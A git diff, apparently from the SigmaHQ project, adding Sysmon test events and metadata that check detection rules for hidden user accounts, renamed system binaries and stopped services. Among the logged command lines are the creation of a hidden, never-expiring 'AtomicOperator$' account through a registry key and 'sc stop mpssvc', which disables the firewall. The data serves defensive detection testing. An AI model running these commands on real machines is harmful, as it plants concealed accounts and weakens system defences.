b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx new file mode 100644 index 000000000..81684555a Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json new file mode 100644 index 000000000..0ddd2e498 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.367278Z" + } + }, + "EventRecordID": 657153, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-31 05:06:45.364", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\System32\\reg.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Registry Console Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "reg.exe", + "CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\", + "User": "MIDGARDNET\\SwachchhandaP", + "LogonGuid": "14207D89-34DD-6904-8287-190000000000", + "LogonId": "0x198782", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", + "ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002", + "ParentProcessId": 6656, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0", + "ParentUser": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml new file mode 100644 index 000000000..8b2a1c592 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml @@ -0,0 +1,13 @@ +id: de8dc72e-19eb-465a-83ac-59545ae56426 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: 9ec9fb1b-e059-4489-9642-f270c207923d + title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx new file mode 100644 index 000000000..0d04a62fd Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json new file mode 100644 index 000000000..4212ed2dd --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:26:58.441823Z" + } + }, + "EventRecordID": 256793, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:26:58.421", + "ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02", + "ProcessId": 6856, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe", + "FileVersion": "1.52.0.5064", + "Description": "-", + "Product": "AdFind", + "Company": "www.joeware.net", + "OriginalFileName": "AdFind.exe", + "CommandLine": "renamed-AdFind.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=12011C44955FD6631113F68A99447515,SHA256=C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3,IMPHASH=12CE1C0F3F5837ECC18A3782408FA975", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml new file mode 100644 index 000000000..535f0a655 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_adfind/info.yml @@ -0,0 +1,13 @@ +id: 09eb713e-f4b1-42ce-9c8e-d446ba0d548a +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df55196f-f105-44d3-a675-e9dfb6cc2f2b + title: Renamed AdFind Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx new file mode 100644 index 000000000..a445e6016 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json new file mode 100644 index 000000000..9e76fe811 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:29:25.275782Z" + } + }, + "EventRecordID": 256823, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:29:25.272", + "ProcessGuid": "5AB40FD1-3EA5-68F9-2F31-000000003B02", + "ProcessId": 4564, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-netsh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Network Command Shell", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "netsh.exe", + "CommandLine": "renamed-netsh.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml new file mode 100644 index 000000000..1decc3d31 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary/info.yml @@ -0,0 +1,13 @@ +id: e9861f82-77a9-4f8b-a418-0fbb6019588b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 + title: Potential Defense Evasion Via Binary Rename +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx new file mode 100644 index 000000000..f673a38d5 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json new file mode 100644 index 000000000..679f6bc4a --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:28:22.116872Z" + } + }, + "EventRecordID": 256810, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:28:22.113", + "ProcessGuid": "5AB40FD1-3E66-68F9-2831-000000003B02", + "ProcessId": 4832, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-wscript.exe", + "FileVersion": "5.812.10240.16384", + "Description": "Microsoft ® Windows Based Script Host", + "Product": "Microsoft ® Windows Script Host", + "Company": "Microsoft Corporation", + "OriginalFileName": "wscript.exe", + "CommandLine": "renamed-wscript.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml new file mode 100644 index 000000000..c0be2dd95 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml @@ -0,0 +1,13 @@ +id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx new file mode 100644 index 000000000..1cbd0fd5e Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json new file mode 100644 index 000000000..965a92298 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:30:29.328671Z" + } + }, + "EventRecordID": 256840, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:30:29.319", + "ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02", + "ProcessId": 480, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "renamed-curl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml new file mode 100644 index 000000000..3c18db285 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml @@ -0,0 +1,13 @@ +id: a8016fa4-d7e0-40de-85b0-ae04f270eec5 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7530cd3d-7671-43e3-b209-976966f6ea48 + title: Renamed CURL.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx new file mode 100644 index 000000000..d133234a8 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json new file mode 100644 index 000000000..0b1521ea0 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:25:23.218638Z" + } + }, + "EventRecordID": 256757, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:25:23.215", + "ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02", + "ProcessId": 5312, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "File Transfer Program", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "ftp.exe", + "CommandLine": "renamed-ftp.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C", + "ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02", + "ParentProcessId": 476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml new file mode 100644 index 000000000..dc986bbfb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml @@ -0,0 +1,13 @@ +id: 280664b2-b588-40f6-8b65-280523049740 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 277a4393-446c-449a-b0ed-7fdc7795244c + title: Renamed FTP.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx new file mode 100644 index 000000000..aff2198c8 Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json new file mode 100644 index 000000000..9ae6747df --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:32:00.478719Z" + } + }, + "EventRecordID": 256855, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:32:00.468", + "ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02", + "ProcessId": 2808, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Diagnostics Troubleshooting Wizard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "msdt.exe", + "CommandLine": "renamed-msdt.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml new file mode 100644 index 000000000..39305505b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml @@ -0,0 +1,13 @@ +id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bd1c6866-65fc-44b2-be51-5588fcff82b9 + title: Renamed Msdt.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx new file mode 100644 index 000000000..b1c5e625a Binary files /dev/null and b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx differ diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": 